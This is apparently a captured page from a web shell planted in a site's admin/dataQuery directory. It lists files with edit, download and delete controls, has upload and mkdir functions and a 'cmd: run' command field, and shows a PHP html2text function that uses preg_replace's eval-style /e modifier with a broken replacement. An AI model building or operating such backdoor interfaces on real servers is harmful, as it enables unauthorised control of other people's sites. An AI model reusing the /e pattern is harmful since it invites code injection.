/
home
/
u775757334
/
domains
/
civicwelllife.com
/
public_html
/
admin
/
dataQuery
/
/home/u775757334/domains/civicwelllife.com/public_html/admin/dataQuery
mkdir
upload
Name
Size
Mode
Actions
common-function.php
1130
0644
edit
dl
rm
error_log
8916
0644
edit
dl
rm
process.php
254317
0644
edit
dl
rm
Edit:
/home/u775757334/domains/civicwelllife.com/public_html/admin/dataQuery/common-function.php
(1130B)
<?php function html2text($Document) { $Rules = array ('@<script[^>]*?>.*?</script>@si', '@<[\/\!]*?[^<>]*?>@si', '@([\r\n])[\s]+@', '@&(quot|#34);@i', '@&(amp|#38);@i', '@&(lt|#60);@i', '@&(gt|#62);@i', '@&(nbsp|#160);@i', '@&(iexcl|#161);@i', '@&(cent|#162);@i', '@&(pound|#163);@i', '@&(copy|#169);@i', '@&(reg|#174);@i', '@&#(d+);@e' ); $Replace = array ('', '', '', '', '&', '<', '>', ' ', chr(161), chr(162), chr(163), chr(169), chr(174), 'chr()' ); return preg_replace($Rules, $Replace, $Document); } ?>
Save
cmd:
run